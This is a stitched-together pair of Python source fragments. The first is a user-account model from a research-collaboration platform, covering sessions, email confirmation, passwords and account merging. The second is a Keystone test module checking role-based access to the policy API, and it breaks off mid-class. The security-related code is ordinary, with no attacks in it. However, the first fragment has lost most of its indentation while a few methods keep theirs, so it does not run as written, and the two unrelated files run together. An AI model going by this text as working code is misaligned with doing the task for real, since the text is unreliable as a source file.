def __repr__(self):
return '<User({0!r}) with id {1!r}>'.format(self.username, self._id)
def __str__(self):
return self.fullname.encode('ascii', 'replace')
__unicode__ = __str__
# For compatibility with Django auth
@property
def pk(self):
return self._id
@property
def email(self):
return self.username
def is_authenticated(self): # Needed for django compat
return True
def is_anonymous(self):
return False
@property
def absolute_api_v2_url(self):
from api.base.utils import absolute_reverse # Avoid circular dependency
return absolute_reverse('users:user-detail', kwargs={'user_id': self.pk})
# used by django and DRF
def get_absolute_url(self):
return self.absolute_api_v2_url
@classmethod
def create_unregistered(cls, fullname, email=None):
"""Create a new unregistered user.
"""
user = cls(
username=email,
fullname=fullname,
is_invited=True,
is_registered=False,
)
user.update_guessed_names()
return user
@classmethod
def create(cls, username, password, fullname):
user = cls(
username=username,
fullname=fullname,
)
user.update_guessed_names()
user.set_password(password)
return user
    @classmethod
    def create_unconfirmed(cls, username, password, fullname, do_confirm=True):
        """Create a new user who has begun registration but needs to verify
        their primary email address (username).

        :param str username: Primary email address; an unconfirmed-email
            verification token is generated for it.
        :param str password: Raw password; hashed via ``set_password``
            inside ``create``.
        :param str fullname: The user's full name.
        :param bool do_confirm: NOTE(review): unused in this method --
            confirm whether it can be removed or should gate the
            ``add_unconfirmed_email`` call.
        :return: The new (unsaved) user with ``is_registered`` False.
        """
        user = cls.create(username, password, fullname)
        user.add_unconfirmed_email(username)
        user.is_registered = False
        return user
@classmethod
def create_confirmed(cls, username, password, fullname):
user = cls.create(username, password, fullname)
user.is_registered = True
user.is_claimed = True
user.date_confirmed = user.date_registered
return user
@classmethod
def from_cookie(cls, cookie, secret=None):
"""Attempt to load a user from their signed cookie
:returns: None if a user cannot be loaded else User
"""
if not cookie:
return None
secret = secret or settings.SECRET_KEY
try:
token = itsdangerous.Signer(secret).unsign(cookie)
except itsdangerous.BadSignature:
return None
user_session = Session.load(token)
if user_session is None:
return None
return cls.load(user_session.data.get('auth_user_id'))
def get_or_create_cookie(self, secret=None):
"""Find the cookie for the given user
Create a new session if no cookie is found
:param str secret: The key to sign the cookie with
:returns: The signed cookie
"""
secret = secret or settings.SECRET_KEY
sessions = Session.find(
Q('data.auth_user_id', 'eq', self._id)
).sort(
'-date_modified'
).limit(1)
if sessions.count() > 0:
user_session = sessions[0]
else:
user_session = Session(data={
'auth_user_id': self._id,
'auth_user_username': self.username,
'auth_user_fullname': self.fullname,
})
user_session.save()
signer = itsdangerous.Signer(secret)
return signer.sign(user_session._id)
def update_guessed_names(self):
"""Updates the CSL name fields inferred from the the full name.
"""
parsed = utils.impute_names(self.fullname)
self.given_name = parsed['given']
self.middle_names = parsed['middle']
self.family_name = parsed['family']
self.suffix = parsed['suffix']
def register(self, username, password=None):
"""Registers the user.
"""
self.username = username
if password:
self.set_password(password)
if username not in self.emails:
self.emails.append(username)
self.is_registered = True
self.is_claimed = True
self.date_confirmed = dt.datetime.utcnow()
self.update_search()
self.update_search_nodes()
# Emit signal that a user has confirmed
signals.user_confirmed.send(self)
return self
def add_unclaimed_record(self, node, referrer, given_name, email=None):
"""Add a new project entry in the unclaimed records dictionary.
:param Node node: Node this unclaimed user was added to.
:param User referrer: User who referred this user.
:param str given_name: The full name that the referrer gave for this user.
:param str email: The given email address.
:returns: The added record
"""
if not node.can_edit(user=referrer):
raise PermissionsError('Referrer does not have permission to add a contributor '
'to project {0}'.format(node._primary_key))
project_id = node._primary_key
referrer_id = referrer._primary_key
if email:
clean_email = email.lower().strip()
else:
clean_email = None
record = {
'name': given_name,
'referrer_id': referrer_id,
'token': generate_confirm_token(),
'email': clean_email
}
self.unclaimed_records[project_id] = record
return record
def display_full_name(self, node=None):
"""Return the full name , as it would display in a contributor list for a
given node.
NOTE: Unclaimed users may have a different name for different nodes.
"""
if node:
unclaimed_data = self.unclaimed_records.get(node._primary_key, None)
if unclaimed_data:
return unclaimed_data['name']
return self.fullname
@property
def is_active(self):
"""Returns True if the user is active. The user must have activated
their account, must not be deleted, suspended, etc.
:return: bool
"""
return (self.is_registered and
self.password is not None and
not self.is_merged and
not self.is_disabled and
self.is_confirmed)
def get_unclaimed_record(self, project_id):
"""Get an unclaimed record for a given project_id.
:raises: ValueError if there is no record for the given project.
"""
try:
return self.unclaimed_records[project_id]
except KeyError: # reraise as ValueError
raise ValueError('No unclaimed record for user {self._id} on node {project_id}'
.format(**locals()))
def get_claim_url(self, project_id, external=False):
"""Return the URL that an unclaimed user should use to claim their
account. Return ``None`` if there is no unclaimed_record for the given
project ID.
:param project_id: The project ID for the unclaimed record
:raises: ValueError if a record doesn't exist for the given project ID
:rtype: dict
:returns: The unclaimed record for the project
"""
uid = self._primary_key
base_url = settings.DOMAIN if external else '/'
unclaimed_record = self.get_unclaimed_record(project_id)
token = unclaimed_record['token']
return '{base_url}user/{uid}/{project_id}/claim/?token={token}'\
.format(**locals())
def set_password(self, raw_password):
"""Set the password for this user to the hash of ``raw_password``."""
self.password = generate_password_hash(raw_password)
def check_password(self, raw_password):
"""Return a boolean of whether ``raw_password`` was correct."""
if not self.password or not raw_password:
return False
return check_password_hash(self.password, raw_password)
@property
def csl_given_name(self):
parts = [self.given_name]
if self.middle_names:
parts.extend(each[0] for each in re.split(r'\s+', self.middle_names))
return ' '.join(parts)
@property
def csl_name(self):
return {
'family': self.family_name,
'given': self.csl_given_name,
}
# TODO: This should not be on the User object.
def change_password(self, raw_old_password, raw_new_password, raw_confirm_password):
"""Change the password for this user to the hash of ``raw_new_password``."""
raw_old_password = (raw_old_password or '').strip()
raw_new_password = (raw_new_password or '').strip()
raw_confirm_password = (raw_confirm_password or '').strip()
issues = []
if not self.check_password(raw_old_password):
issues.append('Old password is invalid')
elif raw_old_password == raw_new_password:
issues.append('Password cannot be the same')
if not raw_old_password or not raw_new_password or not raw_confirm_password:
issues.append('Passwords cannot be blank')
elif len(raw_new_password) < 6:
issues.append('Password should be at least six characters')
elif len(raw_new_password) > 256:
issues.append('Password should not be longer than 256 characters')
if raw_new_password != raw_confirm_password:
issues.append('Password does not match the confirmation')
if issues:
raise ChangePasswordError(issues)
self.set_password(raw_new_password)
def _set_email_token_expiration(self, token, expiration=None):
"""Set the expiration date for given email token.
:param str token: The email token to set the expiration for.
:param datetime expiration: Datetime at which to expire the token. If ``None``, the
token will expire after ``settings.EMAIL_TOKEN_EXPIRATION`` hours. This is only
used for testing purposes.
"""
expiration = expiration or (dt.datetime.utcnow() + dt.timedelta(hours=settings.EMAIL_TOKEN_EXPIRATION))
self.email_verifications[token]['expiration'] = expiration
return expiration
def add_unconfirmed_email(self, email, expiration=None):
"""Add an email verification token for a given email."""
# TODO: This is technically not compliant with RFC 822, which requires
# that case be preserved in the "local-part" of an address. From
# a practical standpoint, the vast majority of email servers do
# not preserve case.
# ref: https://tools.ietf.org/html/rfc822#section-6
email = email.lower().strip()
if email in self.emails:
raise ValueError("Email already confirmed to this user.")
utils.validate_email(email)
# If the unconfirmed email is already present, refresh the token
if email in self.unconfirmed_emails:
self.remove_unconfirmed_email(email)
token = generate_confirm_token()
# handle when email_verifications is None
if not self.email_verifications:
self.email_verifications = {}
self.email_verifications[token] = {'email': email}
self._set_email_token_expiration(token, expiration=expiration)
return token
def remove_unconfirmed_email(self, email):
"""Remove an unconfirmed email addresses and their tokens."""
for token, value in self.email_verifications.iteritems():
if value.get('email') == email:
del self.email_verifications[token]
return True
return False
def remove_email(self, email):
"""Remove a confirmed email"""
if email == self.username:
raise PermissionsError("Can't remove primary email")
if email in self.emails:
self.emails.remove(email)
signals.user_email_removed.send(self, email=email)
@signals.user_email_removed.connect
def _send_email_removal_confirmations(self, email):
mails.send_mail(to_addr=self.username,
mail=mails.REMOVED_EMAIL,
user=self,
removed_email=email,
security_addr='alternate email address ({})'.format(email))
mails.send_mail(to_addr=email,
mail=mails.REMOVED_EMAIL,
user=self,
removed_email=email,
security_addr='primary email address ({})'.format(self.username))
    def get_confirmation_token(self, email, force=False):
        """Return the confirmation token for a given email.

        :param str email: Email to get the token for (matched
            case-insensitively).
        :param bool force: If an expired token exists for the given email, generate a new
            token and return that token.
        :raises: ExpiredTokenError if trying to access a token that is expired and force=False.
        :raises: KeyError if there no token for the email.
        """
        # TODO: Refactor "force" flag into User.get_or_add_confirmation_token
        for token, info in self.email_verifications.items():
            if info['email'].lower() == email.lower():
                # Old records will not have an expiration key. If it's missing,
                # assume the token is expired
                expiration = info.get('expiration')
                if not expiration or (expiration and expiration < dt.datetime.utcnow()):
                    if not force:
                        raise ExpiredTokenError('Token for email "{0}" is expired'.format(email))
                    else:
                        # Mint a fresh token (and persist immediately) so the
                        # caller receives a usable token instead of the
                        # expired record.
                        new_token = self.add_unconfirmed_email(email)
                        self.save()
                        return new_token
                return token
        raise KeyError('No confirmation token for email "{0}"'.format(email))
def get_confirmation_url(self, email, external=True, force=False):
"""Return the confirmation url for a given email.
:raises: ExpiredTokenError if trying to access a token that is expired.
:raises: KeyError if there is no token for the email.
"""
base = settings.DOMAIN if external else '/'
token = self.get_confirmation_token(email, force=force)
return "{0}confirm/{1}/{2}/".format(base, self._primary_key, token)
def _get_unconfirmed_email_for_token(self, token):
"""Return whether or not a confirmation token is valid for this user.
:rtype: bool
"""
if token not in self.email_verifications:
raise exceptions.InvalidTokenError()
verification = self.email_verifications[token]
# Not all tokens are guaranteed to have expiration dates
if (
'expiration' in verification and
verification['expiration'] < dt.datetime.utcnow()
):
raise exceptions.ExpiredTokenError()
return verification['email']
def verify_claim_token(self, token, project_id):
"""Return whether or not a claim token is valid for this user for
a given node which they were added as a unregistered contributor for.
"""
try:
record = self.get_unclaimed_record(project_id)
except ValueError: # No unclaimed record for given pid
return False
return record['token'] == token
def confirm_email(self, token, merge=False):
"""Confirm the email address associated with the token"""
email = self._get_unconfirmed_email_for_token(token)
# If this email is confirmed on another account, abort
try:
user_to_merge = User.find_one(Q('emails', 'iexact', email))
except NoResultsFound:
user_to_merge = None
if user_to_merge and merge:
self.merge_user(user_to_merge)
elif user_to_merge:
raise exceptions.MergeConfirmedRequiredError(
'Merge requires confirmation',
user=self,
user_to_merge=user_to_merge,
)
# If another user has this email as its username, get it
try:
unregistered_user = User.find_one(Q('username', 'eq', email) &
Q('_id', 'ne', self._id))
except NoResultsFound:
unregistered_user = None
if unregistered_user:
self.merge_user(unregistered_user)
self.save()
unregistered_user.username = None
if email not in self.emails:
self.emails.append(email)
# Complete registration if primary email
if email.lower() == self.username.lower():
self.register(self.username)
self.date_confirmed = dt.datetime.utcnow()
# Revoke token
del self.email_verifications[token]
# TODO: We can't assume that all unclaimed records are now claimed.
# Clear unclaimed records, so user's name shows up correctly on
# all projects
self.unclaimed_records = {}
self.save()
self.update_search_nodes()
return True
@property
def unconfirmed_emails(self):
# Handle when email_verifications field is None
email_verifications = self.email_verifications or {}
return [
each['email']
for each
in email_verifications.values()
]
def update_search_nodes(self):
"""Call `update_search` on all nodes on which the user is a
contributor. Needed to add self to contributor lists in search upon
registration or claiming.
"""
for node in self.node__contributed:
node.update_search()
def update_search_nodes_contributors(self):
"""
Bulk update contributor name on all nodes on which the user is
a contributor.
:return:
"""
from website.search import search
search.update_contributors(self.visible_contributor_to)
@property
def is_confirmed(self):
return bool(self.date_confirmed)
@property
def social_links(self):
return {
key: self.SOCIAL_FIELDS[key].format(val)
for key, val in self.social.items()
if val and
self.SOCIAL_FIELDS.get(key)
}
@property
def biblio_name(self):
given_names = self.given_name + ' ' + self.middle_names
surname = self.family_name
if surname != given_names:
initials = [
name[0].upper() + '.'
for name in given_names.split(' ')
if name and re.search(r'\w', name[0], re.I)
]
return u'{0}, {1}'.format(surname, ' '.join(initials))
return surname
@property
def given_name_initial(self):
"""
The user's preferred initialization of their given name.
Some users with common names may choose to distinguish themselves from
their colleagues in this way. For instance, there could be two
well-known researchers in a single field named "Robert Walker".
"Walker, R" could then refer to either of them. "Walker, R.H." could
provide easy disambiguation.
NOTE: The internal representation for this should never end with a
period. "R" and "R.H" would be correct in the prior case, but
"R.H." would not.
"""
return self.given_name[0]
@property
def url(self):
return '/{}/'.format(self._primary_key)
@property
def api_url(self):
return '/api/v1/profile/{0}/'.format(self._primary_key)
@property
def absolute_url(self):
return urlparse.urljoin(settings.DOMAIN, self.url)
@property
def display_absolute_url(self):
url = self.absolute_url
if url is not None:
return re.sub(r'https?:', '', url).strip('/')
@property
def deep_url(self):
return '/profile/{}/'.format(self._primary_key)
@property
def gravatar_url(self):
return filters.gravatar(
self,
use_ssl=True,
size=settings.GRAVATAR_SIZE_ADD_CONTRIBUTOR
)
def get_activity_points(self, db=None):
db = db or framework.mongo.database
return analytics.get_total_activity_count(self._primary_key, db=db)
@property
def is_disabled(self):
"""Whether or not this account has been disabled.
Abstracts ``User.date_disabled``.
:return: bool
"""
return self.date_disabled is not None
@is_disabled.setter
def is_disabled(self, val):
"""Set whether or not this account has been disabled."""
if val:
self.date_disabled = dt.datetime.utcnow()
else:
self.date_disabled = None
@property
def is_merged(self):
'''Whether or not this account has been merged into another account.
'''
return self.merged_by is not None
@property
def profile_url(self):
return '/{}/'.format(self._id)
@property
def contributor_to(self):
return (
node for node in self.node__contributed
if not (
node.is_deleted
or node.is_dashboard
)
)
@property
def visible_contributor_to(self):
return (
node for node in self.contributor_to
if self._id in node.visible_contributor_ids
)
def get_summary(self, formatter='long'):
return {
'user_fullname': self.fullname,
'user_profile_url': self.profile_url,
'user_display_name': name_formatters[formatter](self),
'user_is_claimed': self.is_claimed
}
def save(self, *args, **kwargs):
# TODO: Update mailchimp subscription on username change
# Avoid circular import
from framework.analytics import tasks as piwik_tasks
self.username = self.username.lower().strip() if self.username else None
ret = super(User, self).save(*args, **kwargs)
if self.SEARCH_UPDATE_FIELDS.intersection(ret) and self.is_confirmed:
self.update_search()
self.update_search_nodes_contributors()
if settings.PIWIK_HOST and not self.piwik_token:
piwik_tasks.update_user(self._id)
return ret
def update_search(self):
from website import search
try:
search.search.update_user(self)
except search.exceptions.SearchUnavailableError as e:
logger.exception(e)
log_exception()
@classmethod
def find_by_email(cls, email):
try:
user = cls.find_one(
Q('emails', 'eq', email)
)
return [user]
except:
return []
def serialize(self, anonymous=False):
return {
'id': utils.privacy_info_handle(self._primary_key, anonymous),
'fullname': utils.privacy_info_handle(self.fullname, anonymous, name=True),
'registered': self.is_registered,
'url': utils.privacy_info_handle(self.url, anonymous),
'api_url': utils.privacy_info_handle(self.api_url, anonymous),
}
###### OSF-Specific methods ######
def watch(self, watch_config):
"""Watch a node by adding its WatchConfig to this user's ``watched``
list. Raises ``ValueError`` if the node is already watched.
:param watch_config: The WatchConfig to add.
:param save: Whether to save the user.
"""
watched_nodes = [each.node for each in self.watched]
if watch_config.node in watched_nodes:
raise ValueError('Node is already being watched.')
watch_config.save()
self.watched.append(watch_config)
return None
def unwatch(self, watch_config):
"""Unwatch a node by removing its WatchConfig from this user's ``watched``
list. Raises ``ValueError`` if the node is not already being watched.
:param watch_config: The WatchConfig to remove.
:param save: Whether to save the user.
"""
for each in self.watched:
if watch_config.node._id == each.node._id:
each.__class__.remove_one(each)
return None
raise ValueError('Node not being watched.')
def is_watching(self, node):
'''Return whether a not a user is watching a Node.'''
watched_node_ids = set([config.node._id for config in self.watched])
return node._id in watched_node_ids
def get_recent_log_ids(self, since=None):
'''Return a generator of recent logs' ids.
:param since: A datetime specifying the oldest time to retrieve logs
from. If ``None``, defaults to 60 days before today. Must be a tz-aware
datetime because PyMongo's generation times are tz-aware.
:rtype: generator of log ids (strings)
'''
log_ids = []
# Default since to 60 days before today if since is None
# timezone aware utcnow
utcnow = dt.datetime.utcnow().replace(tzinfo=pytz.utc)
since_date = since or (utcnow - dt.timedelta(days=60))
for config in self.watched:
# Extract the timestamps for each log from the log_id (fast!)
# The first 4 bytes of Mongo's ObjectId encodes time
# This prevents having to load each Log Object and access their
# date fields
node_log_ids = [log_id for log_id in config.node.logs._to_primary_keys()
if bson.ObjectId(log_id).generation_time > since_date and
log_id not in log_ids]
# Log ids in reverse chronological order
log_ids = _merge_into_reversed(log_ids, node_log_ids)
return (l_id for l_id in log_ids)
def get_daily_digest_log_ids(self):
'''Return a generator of log ids generated in the past day
(starting at UTC 00:00).
'''
utcnow = dt.datetime.utcnow()
midnight = dt.datetime(
utcnow.year, utcnow.month, utcnow.day,
0, 0, 0, tzinfo=pytz.utc
)
return self.get_recent_log_ids(since=midnight)
@property
def can_be_merged(self):
"""The ability of the `merge_user` method to fully merge the user"""
return all((addon.can_be_merged for addon in self.get_addons()))
def merge_user(self, user):
"""Merge a registered user into this account. This user will be
a contributor on any project. if the registered user and this account
are both contributors of the same project. Then it will remove the
registered user and set this account to the highest permission of the two
and set this account to be visible if either of the two are visible on
the project.
:param user: A User object to be merged.
"""
# Fail if the other user has conflicts.
if not user.can_be_merged:
raise exceptions.MergeConflictError("Users cannot be merged")
# Move over the other user's attributes
# TODO: confirm
for system_tag in user.system_tags:
if system_tag not in self.system_tags:
self.system_tags.append(system_tag)
self.is_claimed = self.is_claimed or user.is_claimed
self.is_invited = self.is_invited or user.is_invited
# copy over profile only if this user has no profile info
if user.jobs and not self.jobs:
self.jobs = user.jobs
if user.schools and not self.schools:
self.schools = user.schools
if user.social and not self.social:
self.social = user.social
unclaimed = user.unclaimed_records.copy()
unclaimed.update(self.unclaimed_records)
self.unclaimed_records = unclaimed
# - unclaimed records should be connected to only one user
user.unclaimed_records = {}
security_messages = user.security_messages.copy()
security_messages.update(self.security_messages)
self.security_messages = security_messages
for key, value in user.mailing_lists.iteritems():
# subscribe to each list if either user was subscribed
subscription = value or self.mailing_lists.get(key)
signals.user_merged.send(self, list_name=key, subscription=subscription)
# clear subscriptions for merged user
signals.user_merged.send(user, list_name=key, subscription=False)
for node_id, timestamp in user.comments_viewed_timestamp.iteritems():
if not self.comments_viewed_timestamp.get(node_id):
self.comments_viewed_timestamp[node_id] = timestamp
elif timestamp > self.comments_viewed_timestamp[node_id]:
self.comments_viewed_timestamp[node_id] = timestamp
self.emails.extend(user.emails)
user.emails = []
for k, v in user.email_verifications.iteritems():
email_to_confirm = v['email']
if k not in self.email_verifications and email_to_confirm != user.username:
self.email_verifications[k] = v
user.email_verifications = {}
# FOREIGN FIELDS
for watched in user.watched:
if watched not in self.watched:
self.watched.append(watched)
user.watched = []
for account in user.external_accounts:
if account not in self.external_accounts:
self.external_accounts.append(account)
user.external_accounts = []
# - addons
# Note: This must occur before the merged user is removed as a
# contributor on the nodes, as an event hook is otherwise fired
# which removes the credentials.
for addon in user.get_addons():
user_settings = self.get_or_add_addon(addon.config.short_name)
user_settings.merge(addon)
user_settings.save()
# - projects where the user was a contributor
for node in user.node__contributed:
# Skip dashboard node
if node.is_dashboard:
continue
# if both accounts are contributor of the same project
if node.is_contributor(self) and node.is_contributor(user):
if node.permissions[user._id] > node.permissions[self._id]:
permissions = node.permissions[user._id]
else:
permissions = node.permissions[self._id]
node.set_permissions(user=self, permissions=permissions)
visible1 = self._id in node.visible_contributor_ids
visible2 = user._id in node.visible_contributor_ids
if visible1 != visible2:
node.set_visible(user=self, visible=True, log=True, auth=Auth(user=self))
else:
node.add_contributor(
contributor=self,
permissions=node.get_permissions(user),
visible=node.get_visible(user),
log=False,
)
try:
node.remove_contributor(
contributor=user,
auth=Auth(user=self),
log=False,
)
except ValueError:
logger.error('Contributor {0} not in list on node {1}'.format(
user._id, node._id
))
node.save()
# - projects where the user was the creator
for node in user.node__created:
node.creator = self
node.save()
# finalize the merge
remove_sessions_for_user(user)
# - username is set to None so the resultant user can set it primary
# in the future.
user.username = None
user.password = None
user.verification_key = None
user.merged_by = self
user.save()
def get_projects_in_common(self, other_user, primary_keys=True):
"""Returns either a collection of "shared projects" (projects that both users are contributors for)
or just their primary keys
"""
if primary_keys:
projects_contributed_to = set(self.node__contributed._to_primary_keys())
return projects_contributed_to.intersection(other_user.node__contributed._to_primary_keys())
else:
projects_contributed_to = set(self.node__contributed)
return projects_contributed_to.intersection(other_user.node__contributed)
def n_projects_in_common(self, other_user):
"""Returns number of "shared projects" (projects that both users are contributors for)"""
return len(self.get_projects_in_common(other_user, primary_keys=True))
def _merge_into_reversed(*iterables):
'''Merge multiple sorted inputs into a single output in reverse order.
'''
return sorted(itertools.chain(*iterables), reverse=True)
| |
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import json
import uuid
import http.client
from keystone.common import provider_api
import keystone.conf
from keystone.tests.common import auth as common_auth
from keystone.tests import unit
from keystone.tests.unit import base_classes
from keystone.tests.unit import ksfixtures
# Module-level handles to keystone configuration and the registered
# provider APIs used throughout these tests.
CONF = keystone.conf.CONF
PROVIDERS = provider_api.ProviderAPIs
class _SystemUserPoliciesTests(object):
    """Common default functionality for all system users."""

    def test_user_can_list_policies(self):
        """A policy created via the backend must appear in GET /v3/policies."""
        policy = unit.new_policy_ref()
        policy = PROVIDERS.policy_api.create_policy(policy['id'], policy)

        with self.test_client() as c:
            r = c.get('/v3/policies', headers=self.headers)
            # NOTE: the loop variable must not reuse the name ``policy``;
            # shadowing it made the original assertion compare the last
            # listed policy against itself, so it could never fail.
            policy_ids = [p['id'] for p in r.json['policies']]
            self.assertIn(policy['id'], policy_ids)

    def test_user_can_get_policy(self):
        """A system user can retrieve an individual policy by ID."""
        policy = unit.new_policy_ref()
        policy = PROVIDERS.policy_api.create_policy(policy['id'], policy)

        with self.test_client() as c:
            c.get('/v3/policies/%s' % policy['id'],
                  headers=self.headers)
class _SystemReaderAndMemberPoliciesTests(object):
    """Common default functionality for system readers and system members."""

    def test_user_cannot_create_policy(self):
        """POST /v3/policies must return 403 for this persona."""
        body = {
            'id': uuid.uuid4().hex,
            'name': uuid.uuid4().hex,
            'description': uuid.uuid4().hex,
            'enabled': True,
            # Store serialized JSON data as the blob to mimic real world
            # usage.
            'blob': json.dumps({'data': uuid.uuid4().hex, }),
            'type': uuid.uuid4().hex,
        }

        with self.test_client() as c:
            c.post(
                '/v3/policies',
                json=body,
                headers=self.headers,
                expected_status_code=http.client.FORBIDDEN
            )

    def test_user_cannot_update_policy(self):
        """PATCH /v3/policies/{id} must return 403 for this persona."""
        ref = unit.new_policy_ref()
        created = PROVIDERS.policy_api.create_policy(ref['id'], ref)
        change = {'policy': {'name': uuid.uuid4().hex}}

        with self.test_client() as c:
            c.patch(
                '/v3/policies/%s' % created['id'],
                json=change,
                headers=self.headers,
                expected_status_code=http.client.FORBIDDEN
            )

    def test_user_cannot_delete_policy(self):
        """DELETE /v3/policies/{id} must return 403 for this persona."""
        ref = unit.new_policy_ref()
        created = PROVIDERS.policy_api.create_policy(ref['id'], ref)

        with self.test_client() as c:
            c.delete(
                '/v3/policies/%s' % created['id'],
                headers=self.headers,
                expected_status_code=http.client.FORBIDDEN
            )
class _DomainAndProjectUserPolicyTests(object):
    """Every policy API operation must be forbidden for these personas."""

    def test_user_cannot_list_policies(self):
        """GET /v3/policies must return 403 for this persona."""
        ref = unit.new_policy_ref()
        PROVIDERS.policy_api.create_policy(ref['id'], ref)

        with self.test_client() as c:
            c.get('/v3/policies',
                  headers=self.headers,
                  expected_status_code=http.client.FORBIDDEN)

    def test_user_cannot_get_policy(self):
        """GET /v3/policies/{id} must return 403 for this persona."""
        ref = unit.new_policy_ref()
        created = PROVIDERS.policy_api.create_policy(ref['id'], ref)

        with self.test_client() as c:
            c.get('/v3/policies/%s' % created['id'],
                  headers=self.headers,
                  expected_status_code=http.client.FORBIDDEN)

    def test_user_cannot_create_policy(self):
        """POST /v3/policies must return 403 for this persona."""
        body = {
            'id': uuid.uuid4().hex,
            'name': uuid.uuid4().hex,
            'description': uuid.uuid4().hex,
            'enabled': True,
            # Store serialized JSON data as the blob to mimic real world
            # usage.
            'blob': json.dumps({'data': uuid.uuid4().hex, }),
            'type': uuid.uuid4().hex,
        }

        with self.test_client() as c:
            c.post(
                '/v3/policies',
                json=body,
                headers=self.headers,
                expected_status_code=http.client.FORBIDDEN
            )

    def test_user_cannot_update_policy(self):
        """PATCH /v3/policies/{id} must return 403 for this persona."""
        ref = unit.new_policy_ref()
        created = PROVIDERS.policy_api.create_policy(ref['id'], ref)
        change = {'policy': {'name': uuid.uuid4().hex}}

        with self.test_client() as c:
            c.patch(
                '/v3/policies/%s' % created['id'],
                json=change,
                headers=self.headers,
                expected_status_code=http.client.FORBIDDEN
            )

    def test_user_cannot_delete_policy(self):
        """DELETE /v3/policies/{id} must return 403 for this persona."""
        ref = unit.new_policy_ref()
        created = PROVIDERS.policy_api.create_policy(ref['id'], ref)

        with self.test_client() as c:
            c.delete(
                '/v3/policies/%s' % created['id'],
                headers=self.headers,
                expected_status_code=http.client.FORBIDDEN
            )
class SystemReaderTests(base_classes.TestCaseWithBootstrap,
                        common_auth.AuthTestMixin,
                        _SystemUserPoliciesTests,
                        _SystemReaderAndMemberPoliciesTests):

    def setUp(self):
        """Authenticate as a user holding the system reader role."""
        super(SystemReaderTests, self).setUp()
        self.loadapp()
        self.useFixture(ksfixtures.Policy(self.config_fixture))
        self.config_fixture.config(group='oslo_policy', enforce_scope=True)

        user_ref = unit.new_user_ref(
            domain_id=CONF.identity.default_domain_id
        )
        self.user_id = PROVIDERS.identity_api.create_user(user_ref)['id']
        PROVIDERS.assignment_api.create_system_grant_for_user(
            self.user_id, self.bootstrapper.reader_role_id
        )

        auth = self.build_authentication_request(
            user_id=self.user_id,
            password=user_ref['password'],
            system=True
        )

        # Issue a token for this persona once and reuse it in every test.
        with self.test_client() as c:
            r = c.post('/v3/auth/tokens', json=auth)
            self.token_id = r.headers['X-Subject-Token']
            self.headers = {'X-Auth-Token': self.token_id}
class SystemMemberTests(base_classes.TestCaseWithBootstrap,
                        common_auth.AuthTestMixin,
                        _SystemUserPoliciesTests,
                        _SystemReaderAndMemberPoliciesTests):

    def setUp(self):
        """Authenticate as a user holding the system member role."""
        super(SystemMemberTests, self).setUp()
        self.loadapp()
        self.useFixture(ksfixtures.Policy(self.config_fixture))
        self.config_fixture.config(group='oslo_policy', enforce_scope=True)

        user_ref = unit.new_user_ref(
            domain_id=CONF.identity.default_domain_id
        )
        self.user_id = PROVIDERS.identity_api.create_user(user_ref)['id']
        PROVIDERS.assignment_api.create_system_grant_for_user(
            self.user_id, self.bootstrapper.member_role_id
        )

        auth = self.build_authentication_request(
            user_id=self.user_id,
            password=user_ref['password'],
            system=True
        )

        # Issue a token for this persona once and reuse it in every test.
        with self.test_client() as c:
            r = c.post('/v3/auth/tokens', json=auth)
            self.token_id = r.headers['X-Subject-Token']
            self.headers = {'X-Auth-Token': self.token_id}
class SystemAdminTests(base_classes.TestCaseWithBootstrap,
                       common_auth.AuthTestMixin,
                       _SystemUserPoliciesTests):

    def setUp(self):
        """Authenticate as the bootstrapped system administrator."""
        super(SystemAdminTests, self).setUp()
        self.loadapp()
        self.useFixture(ksfixtures.Policy(self.config_fixture))
        self.config_fixture.config(group='oslo_policy', enforce_scope=True)

        # Reuse the system administrator account created during
        # ``keystone-manage bootstrap``
        self.user_id = self.bootstrapper.admin_user_id
        auth = self.build_authentication_request(
            user_id=self.user_id,
            password=self.bootstrapper.admin_password,
            system=True
        )

        # Issue a token for this persona once and reuse it in every test.
        with self.test_client() as c:
            r = c.post('/v3/auth/tokens', json=auth)
            self.token_id = r.headers['X-Subject-Token']
            self.headers = {'X-Auth-Token': self.token_id}

    def test_user_can_create_policy(self):
        """System administrators may create policies."""
        body = {
            'policy': {
                'id': uuid.uuid4().hex,
                'name': uuid.uuid4().hex,
                'description': uuid.uuid4().hex,
                'enabled': True,
                # Store serialized JSON data as the blob to mimic real world
                # usage.
                'blob': json.dumps({'data': uuid.uuid4().hex, }),
                'type': uuid.uuid4().hex
            }
        }

        with self.test_client() as c:
            c.post('/v3/policies', json=body, headers=self.headers)

    def test_user_can_update_policy(self):
        """System administrators may update policies."""
        ref = unit.new_policy_ref()
        created = PROVIDERS.policy_api.create_policy(ref['id'], ref)
        change = {'policy': {'name': uuid.uuid4().hex}}

        with self.test_client() as c:
            c.patch('/v3/policies/%s' % created['id'],
                    json=change,
                    headers=self.headers)

    def test_user_can_delete_policy(self):
        """System administrators may delete policies."""
        ref = unit.new_policy_ref()
        created = PROVIDERS.policy_api.create_policy(ref['id'], ref)

        with self.test_client() as c:
            c.delete('/v3/policies/%s' % created['id'],
                     headers=self.headers)
class DomainUserTests(base_classes.TestCaseWithBootstrap,
                      common_auth.AuthTestMixin,
                      _DomainAndProjectUserPolicyTests):

    def setUp(self):
        """Authenticate as an admin scoped to a freshly created domain."""
        super(DomainUserTests, self).setUp()
        self.loadapp()
        self.useFixture(ksfixtures.Policy(self.config_fixture))
        self.config_fixture.config(group='oslo_policy', enforce_scope=True)

        domain = PROVIDERS.resource_api.create_domain(
            uuid.uuid4().hex, unit.new_domain_ref()
        )
        self.domain_id = domain['id']
        user_ref = unit.new_user_ref(domain_id=self.domain_id)
        self.user_id = PROVIDERS.identity_api.create_user(user_ref)['id']
        PROVIDERS.assignment_api.create_grant(
            self.bootstrapper.admin_role_id, user_id=self.user_id,
            domain_id=self.domain_id
        )

        auth = self.build_authentication_request(
            user_id=self.user_id,
            password=user_ref['password'],
            domain_id=self.domain_id
        )

        # Issue a token for this persona once and reuse it in every test.
        with self.test_client() as c:
            r = c.post('/v3/auth/tokens', json=auth)
            self.token_id = r.headers['X-Subject-Token']
            self.headers = {'X-Auth-Token': self.token_id}
class ProjectUserTests(base_classes.TestCaseWithBootstrap,
                       common_auth.AuthTestMixin,
